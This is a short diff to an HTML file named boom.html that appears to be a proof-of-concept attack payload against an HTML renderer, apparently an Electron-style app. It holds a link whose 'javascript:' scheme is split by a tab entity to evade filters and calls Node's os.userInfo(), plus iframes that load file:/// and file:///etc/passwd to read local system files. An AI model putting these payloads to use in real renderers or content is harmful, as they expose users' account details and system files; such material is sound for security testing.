--- a/boom.html
+++ b/boom.html
@@ -1,6 +1,12 @@
 <a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>
 
 
+<iframe 
+  src="file:///" 
+  width="100%" 
+  height="600px" 
+  style="border:1px solid black;">
+</iframe>
 
 <iframe 
   src="file:///etc/passwd" 
